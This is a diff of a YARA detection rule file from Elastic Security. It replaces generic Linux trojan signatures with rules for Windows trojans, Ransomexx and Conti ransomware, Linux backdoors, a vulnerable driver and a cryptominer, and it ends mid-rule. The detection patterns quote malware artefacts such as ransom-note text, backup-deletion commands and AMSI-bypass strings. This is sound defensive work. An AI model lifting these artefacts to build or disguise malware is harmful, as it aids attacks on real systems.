ELASTIC_Linux_Trojan_Generic_4F4Cc3Ea : FILE MEMORY +rule ELASTIC_Windows_Trojan_Downtown_901C4Fdd : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Trojan Downtown (Windows.Trojan.DownTown)" author = "Elastic Security" - id = "4f4cc3ea-a906-4fce-a482-d762ab8995b8" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "32e25641360dbfd50125c43754cd327cf024f1b3bfd75b617cdf8a17024e2da5" - logic_hash = "9eb0d93b8c1a579ca8362d033edecbbe6a9ade82f6ae5688c183b97ed7b97faa" + id = "901c4fdd-858c-4ad8-be12-f88799d591b9" + date = "2023-05-10" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DownTown.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "6368d37fa9ba4e32131e16bceaee322f2fa8507873d01ebd687536e593354725" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d85dac2bd81925f5d8c90c11047c631c1046767cb6649cd266c3a143353b6c12" + fingerprint = "1ef6dfd9be1e6fa2d1c6b5ce32ad13252f5becf709493a7cceff3519750e0b1e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4A 4E 49 20 55 4E 50 41 43 4B 20 44 45 58 20 53 54 41 52 54 20 } + $a1 = "SendFileBuffer error -1 !!!" fullword + $a2 = "ScheduledDownloadTasks CODE_FILE_VIEW " fullword + $a3 = "ExplorerManagerC.dll" fullword condition: - all of them + 3 of them } -rule ELASTIC_Linux_Trojan_Generic_703A0258 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Downtown_145Ecd2F : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Trojan Downtown (Windows.Trojan.DownTown)" author = "Elastic Security" - id = "703a0258-8d28-483e-a679-21d9ef1917b4" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b086d0119042fc960fe540c23d0a274dd0fb6f3570607823895c9158d4f75974" - logic_hash = "cb37930637b8da91188d199ee20f1b64a0b1f13e966a99e69b983e623dac51de" + id = "145ecd2f-d012-4566-a2e9-696cdbd793ce" + date = "2023-08-23" + modified = "2023-09-20" + reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DownTown.yar#L23-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "744a51c5317e265177185d9d0b8838a8fc939b4c56cc5e5bc51d5432d046d9f1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "796c2283eb14057081409800480b74ab684413f8f63a9db8704f5057026fb556" + fingerprint = "d755ad4a24b390ce56d4905e40cec83a39ea515cfbe7e1a534950ca858343e70" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C2 F7 89 76 7E 86 87 F6 2B A3 2C 94 61 36 BE B6 } + $a1 = "DeletePluginObject" + $a2 = "GetPluginInfomation" + $a3 = "GetPluginObject" + $a4 = "GetRegisterCode" condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_378765E4 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ransomexx_Fabff49C : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Ransomware Ransomexx (Windows.Ransomware.Ransomexx)" author = "Elastic Security" - id = "378765e4-c0f2-42ad-a42b-b992d3b866f4" - date = "2021-04-06" - modified = "2021-09-16" + id = "fabff49c-8e1a-4020-b081-2f432532e529" + date = "2021-08-07" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ed42910e09e88777ae9958439d14176cb77271edf110053e1a29372fce21ec1" - logic_hash = "dd10305f553fa94ff83fafa84cff3d544f097b617fca20760eef838902e1f7db" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ransomexx.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7" + logic_hash = "67d5123b706685ea5ab939aec31cb1549297778d91dd38b14e109945c52da71a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "60f259ba5ffe607b594c2744b9b30c35beab9683f4cd83c2e31556a387138923" + fingerprint = "a7a1e6d5fafdddc7d4699710edf407653968ffd40747c50f26ef63a6cb623bbe" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 ?? FB FF FF 83 7D D4 00 79 0A B8 ?? 22 60 00 } + $a1 = "ransom.exx" ascii fullword + $a2 = "Infrastructure rebuild will cost you MUCH more." wide fullword + $a3 = "Your files are securely ENCRYPTED." wide fullword + $a4 = "delete catalog -quiet" wide fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_F657Fb4F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Rudebird_3Cbf7Bc6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Trojan Rudebird (Windows.Trojan.RudeBird)" author = "Elastic Security" - id = "f657fb4f-a065-4d51-bead-fd28f8053418" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ed42910e09e88777ae9958439d14176cb77271edf110053e1a29372fce21ec1" - logic_hash = "af4fa2c21b47f360b425ebbfea624e3728cd682e54e367d265b4f3a6515b0720" + id = "3cbf7bc6-71c5-4c7c-a846-7a95c3d28917" + date = "2023-05-09" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_RudeBird.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2095c3b6bde779b5661c7796b5e33bb0c43facf791b272a603b786f889a06a95" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8c15d5e53b95002f569d63c91db7858c4ca8f26c441cb348a1b34f3b26d02468" + fingerprint = "f70bd86d877d9371601c7f65cf50a5bb9b76ba45acbf591bd8e4c1117a0cac1d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 ?? FB FF FF 83 7D D4 00 79 0A B8 ?? ?? 60 00 } + $a1 = { 40 53 48 83 EC 20 48 8B D9 B9 D8 00 00 00 E8 FD C1 FF FF 48 8B C8 33 C0 48 85 C9 74 05 E8 3A F2 } condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_Be1757Ef : FILE MEMORY +rule ELASTIC_Windows_Trojan_Powerseal_D63F5E54 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Trojan Powerseal (Windows.Trojan.PowerSeal)" author = "Elastic Security" - id = "be1757ef-cf45-4c00-8d6c-dbb0f44f6efb" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e4e2b5af9d0c72aae83cec57e5c091a95c549f826e8f13559aaf7d300f6e13" - logic_hash = "567d33c262e5f812c6a702bcc0a1f0cf576b67bf7cf67bb82b5f9ce9f233aaff" + id = "d63f5e54-6be1-453d-a96e-083a025deba2" + date = "2023-03-16" + modified = "2023-05-26" + reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PowerSeal.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "523dcff68a51ea8fb022066b5f09394e8174d6c157222a08100de30669898057" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "0af6b01197b63259d9ecbc24f95b183abe7c60e3bf37ca6ac1b9bc25696aae77" + fingerprint = "bc63511a0b12edaf7a2ace02f79ab9a2dbea5a0879fd976cc91308f98bac1c52" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 20 54 68 75 20 4D 61 72 20 31 20 31 34 3A 34 34 3A 30 38 20 } + $a1 = "PowerSeal.dll" wide fullword + $a2 = "InvokePs" ascii fullword + $a3 = "amsiInitFailed" wide fullword + $a4 = "is64BitOperatingSystem" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_7A95Ef79 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Powerseal_2E50F393 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Trojan Powerseal (Windows.Trojan.PowerSeal)" author = "Elastic Security" - id = "7a95ef79-3df5-4f7a-a8ba-00577473b288" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f59340a740af8f7f4b96e3ea46d38dbe81f2b776820b6f53b7028119c5db4355" - logic_hash = "6da43e4bab6b2024b49dfc943f099fb21c06d8d4a082a05594b07cb55989183c" + id = "2e50f393-40c0-49f7-882e-33f914eff32d" + date = "2023-05-10" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PowerSeal.yar#L24-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "3ca1d4568fea7b2e4e9d30ba03662a2c28ee8623d887a0336e27989b5c98b55f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "aadec0fa964f94afb725a568dacf21e80b80d359cc5dfdd8d028aaece04c7012" + fingerprint = "9b7beb5af64bc57d78cfb8f5bf8134461d8f2fbe7c935a0fa2b44fb51160a28d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 1C 8B 54 24 20 8B 74 24 24 CD 80 5E 5A 59 5B C3 } + $a1 = "[+] Loading PowerSeal" + $a2 = "[!] Failed to exec PowerSeal" + $a3 = "AppDomain: unable to get the name!" condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Generic_1C5E42B7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Darkcloud_9905Abce : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Trojan Darkcloud (Windows.Trojan.DarkCloud)" author = "Elastic Security" - id = "1c5e42b7-b873-443e-a30c-66a75fc39b21" - date = "2021-04-06" - modified = "2021-09-16" + id = "9905abce-cbfc-4c92-aef6-38f2099eb5da" + date = "2023-05-03" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L161-L179" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f" - logic_hash = "cd759b87a303fafb9461d0a73b6a6b3f468b1f3db0189ba0e584a629e5d78da1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DarkCloud.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "500cb8459c19acd5a1144c4b509c14dbddec74ad623896bfe946fde1cd99a571" + logic_hash = "27d3841d6acf87f5c9c03d643c7859d9eaf42e49ed0241b761f858c669c4e931" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b64284e1220ec9abc9b233e513020f8b486c76f91e4c3f2a0a6fb003330c2535" + fingerprint = "5aeb210b37f4b2b4032917f53f2fb0422132aa1f8cddf0f47bccf50ff68ce00c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 89 C0 89 45 F4 83 7D F4 FF 75 1C 83 EC 0C 68 } + $a1 = { 8D 45 DC 57 57 6A 01 6A 11 50 6A 01 68 80 00 00 00 89 7D E8 89 } + $a2 = { C8 33 FF 50 57 FF D6 8D 4D DC 51 57 FF D6 C3 8B 4D F0 8B 45 } condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_8Ca4B663 : FILE MEMORY +rule ELASTIC_Linux_Backdoor_Generic_Babf9101 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Linux Backdoor Generic (Linux.Backdoor.Generic)" author = "Elastic Security" - id = "8ca4b663-b282-4322-833a-4c0143f63634" - date = "2022-01-05" - modified = "2022-01-26" + id = "babf9101-1e6e-4268-a530-e99e2c905b0d" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L181-L199" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ddf479e504867dfa27a2f23809e6255089fa0e2e7dcf31b6ce7d08f8d88947e" - logic_hash = "43b8cae2075f55a98b226f865d54e1c96345db0564815d849b3458d3f3ffee7f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Backdoor_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9ea73d2c2a5f480ae343846e2b6dd791937577cb2b3d8358f5b6ede8f3696b86" + logic_hash = "40084f3bed66c1d4a1cd2ffca99fd6789c8ed2db04031e4d4a4926b41d622355" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "34e04e32ee493643cc37ff0cfb94dcbc91202f651bc2560e9c259b53a9d6acfc" + fingerprint = "a578b052910962523f26f14f0d0494481fe0777c01d9f6816c7ab53083a47adc" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101169,28 +101636,28 @@ rule ELASTIC_Linux_Trojan_Generic_8Ca4B663 : FILE MEMORY os = "linux" strings: - $a = { 28 60 DF F2 FB B7 E7 EB 96 D1 E6 96 88 12 96 EB 8C 94 EB C7 4E } + $a = { C4 10 89 45 F4 83 7D F4 00 79 1F 83 EC 0C 68 22 } condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_D3Fe3Fae : FILE MEMORY +rule ELASTIC_Linux_Backdoor_Generic_5776Ae49 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Linux Backdoor Generic (Linux.Backdoor.Generic)" author = "Elastic Security" - id = "d3fe3fae-f7ec-48d5-8b17-9ab11a5b689f" - date = "2022-01-05" + id = "5776ae49-64e9-46a0-a0bb-b0226eb9a8bd" + date = "2021-04-06" modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L201-L219" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2a2542142adb05bff753e0652e119c1d49232d61c49134f13192425653332dc3" - logic_hash = "0b980a0bcf8340410fe2b53d109f629c6e871ebe82af467153d7b50b73fd8644" - score = 60 - quality = 43 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Backdoor_Generic.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e247a5decb5184fd5dee0d209018e402c053f4a950dae23be59b71c082eb910c" + logic_hash = "b606f12c47182d80e07f8715639c3cc73753274bd8833cb9f6380879356a2b12" + score = 75 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "1773a3e22cb44fe0b3e68d343a92939a955027e735c60b48cf3b7312ce3a6415" + fingerprint = "2d36fbe1820805c8fd41b2b34a2a2b950fc003ae4f177042dc0d2568925c5b76" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101198,57 +101665,57 @@ rule ELASTIC_Linux_Trojan_Generic_D3Fe3Fae : FILE MEMORY os = "linux" strings: - $a = { 47 53 45 54 2C 20 70 69 64 2C 20 4E 54 5F 50 52 53 54 41 54 } + $a = { 18 C1 E8 08 88 47 12 8B 46 18 88 47 13 83 C4 1C 5B 5E 5F 5D } condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_5E981634 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Eneio_6E01882F : FILE { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Windows Vulndriver Eneio (Windows.VulnDriver.EneIo)" author = "Elastic Security" - id = "5e981634-e34e-4943-bf8f-86cfd9fffc85" - date = "2022-01-05" - modified = "2022-01-26" + id = "6e01882f-8394-4e32-8049-fa9c4588b087" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L221-L239" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "448e8d71e335cabf5c4e9e8d2d31e6b52f620dbf408d8cc9a6232a81c051441b" - logic_hash = "4623c07a15588788ec8a484642a33f2d18127849302d57520a0dac875564f62c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_EneIo.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347" + logic_hash = "144ac5375cb637b6301a2275f2412fbd0d0c5fb23105c7cce5aa7912cf68fa2c" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "57f1e8fa41f6577f41a73e3460ef0c6c5b0a65567ae0962b080dfc8ab18364f5" - severity = 100 + tags = "FILE" + fingerprint = "8077212bfbadc7f47f2eb76f123a6e4bcda12009293cb975bbeaba77f8c9dcd0" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 74 1D 8B 44 24 68 89 84 24 A4 00 00 00 8B 44 24 6C 89 84 24 A8 00 } + $str1 = "\\Release\\EneIo.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Generic_D8953Ca0 : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Conti_53A640F4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Linux Ransomware Conti (Linux.Ransomware.Conti)" author = "Elastic Security" - id = "d8953ca0-f1f1-4d76-8c80-06f16998ba03" - date = "2022-01-05" - modified = "2022-01-26" + id = "53a640f4-905c-4b0d-ac4a-9ffdffd74253" + date = "2022-09-22" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L241-L259" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "552753661c3cc7b3a4326721789808482a4591cb662bc813ee50d95f101a3501" - logic_hash = "cbc1a60a1d9525f7230336dff07f56e6a0b99e7c70c99d3f4363c06ed0071716" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Conti.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8b57e96e90cd95fc2ba421204b482005fe41c28f506730b6148bcef8316a3201" + logic_hash = "b83a47664d8acce7de17ac5972d9fd5e708c8cd3d8ebedc2bacf1397fd25f5d3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "16ab55f99be8ed2a47618978a335a8c68369563c0a4d0a7ff716b5d4c9e0785c" + fingerprint = "d81309f83494b0635444234c514fda0edc05a11ac861c769a007f9f558def148" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101256,28 +101723,28 @@ rule ELASTIC_Linux_Trojan_Generic_D8953Ca0 : FILE MEMORY os = "linux" strings: - $a = { 5B 9C 9C 9C 9C 5C 5D 5E 5F 9C 9C 9C 9C B1 B2 B3 B4 9C 9C 9C 9C } + $a = { 48 D3 EA 48 89 D0 83 E0 01 48 85 C0 0F 95 C0 84 C0 74 0B 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_181054Af : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Conti_A89C26Cf : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Linux Ransomware Conti (Linux.Ransomware.Conti)" author = "Elastic Security" - id = "181054af-dc05-4981-8a57-ea17ffd6241f" - date = "2022-01-05" - modified = "2022-01-26" + id = "a89c26cf-ccec-40ca-85d3-d014b767fd6a" + date = "2023-07-30" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L261-L279" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e677f1eed0dbb4c680549e0bf86d92b0a28a85c6d571417baaba0d0719da5f93" - logic_hash = "e92807b603dd33fe7a083985644a213913a77e81c068623fdac7931148207b91" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Conti.yar#L21-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "95776f31cbcac08eb3f3e9235d07513a6d7a6bf9f1b7f3d400b2cf0afdb088a7" + logic_hash = "301f3f3ece06a1cd6788db6e3003497b27470780eaaad95f40ed926e7623793e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8ef033ac0fccd10cdf2e66446461b7c8b29574e5869440a1972dbe4bb5fbed89" + fingerprint = "c29bb1bbbd76712bbc3ddd1dfeeec40b230677339dea7441b1f34159ccbbdf9f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101285,28 +101752,31 @@ rule ELASTIC_Linux_Trojan_Generic_181054Af : FILE MEMORY os = "linux" strings: - $a = { 6D 6F 64 00 73 65 74 75 74 78 65 6E 74 00 67 6D 74 69 6D 65 00 } + $a1 = "paremeter --size cannot be %d" fullword + $a2 = "--vmkiller" fullword + $a3 = ".conti" fullword + $a4 = "Cannot create file vm-list.txt" fullword condition: - all of them + 3 of them } -rule ELASTIC_Linux_Trojan_Generic_C3D529A2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Malxmr_7054A0D0 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Linux Trojan Malxmr (Linux.Trojan.Malxmr)" author = "Elastic Security" - id = "c3d529a2-f2c7-41de-ba2a-2cbf2eb4222c" - date = "2022-09-12" - modified = "2022-10-18" + id = "7054a0d0-11d4-4671-a88d-ea933e73fe11" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L281-L299" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b46135ae52db6399b680e5c53f891d101228de5cd6c06b6ae115e4a763a5fb22" - logic_hash = "a508acd95844a4385943166f715606199048d96be0098bc89f9be7b9db34833e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Malxmr.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3a6b3552ffac13aa70e24fef72b69f683ac221105415efb294fb9a2fc81c260a" + logic_hash = "f7153fb11e0e4bf422021cc0fab99536c2a193198bf70d7f2af2fa5c1971c028" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "72ef5b28489e01c3f2413b9a907cda544fc3f60e00451382e239b55ec982f187" + fingerprint = "9661cc2b7a1d7b882ca39307adc927f5fb73d59f3771a8b456c2cf2ff3d801e9" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101314,28 +101784,28 @@ rule ELASTIC_Linux_Trojan_Generic_C3D529A2 : FILE MEMORY os = "linux" strings: - $a = { 1C 31 C0 5B 5E 5F 5D C3 8B 1C 24 C3 8D 64 24 04 53 8B DA 5B } + $a = { 6E 64 47 56 7A 64 48 52 6C 63 33 52 30 5A 58 4E 30 64 47 56 } condition: all of them } -rule ELASTIC_Linux_Trojan_Generic_4675Dffa : FILE MEMORY +rule ELASTIC_Linux_Trojan_Malxmr_144994A5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" + description = "Detects Linux Trojan Malxmr (Linux.Trojan.Malxmr)" author = "Elastic Security" - id = "4675dffa-0536-4a4d-bedb-f8c7fa076168" - date = "2023-07-28" - modified = "2024-02-13" + id = "144994a5-1e37-4913-b7aa-deed638b1a79" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Generic.yar#L301-L320" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - 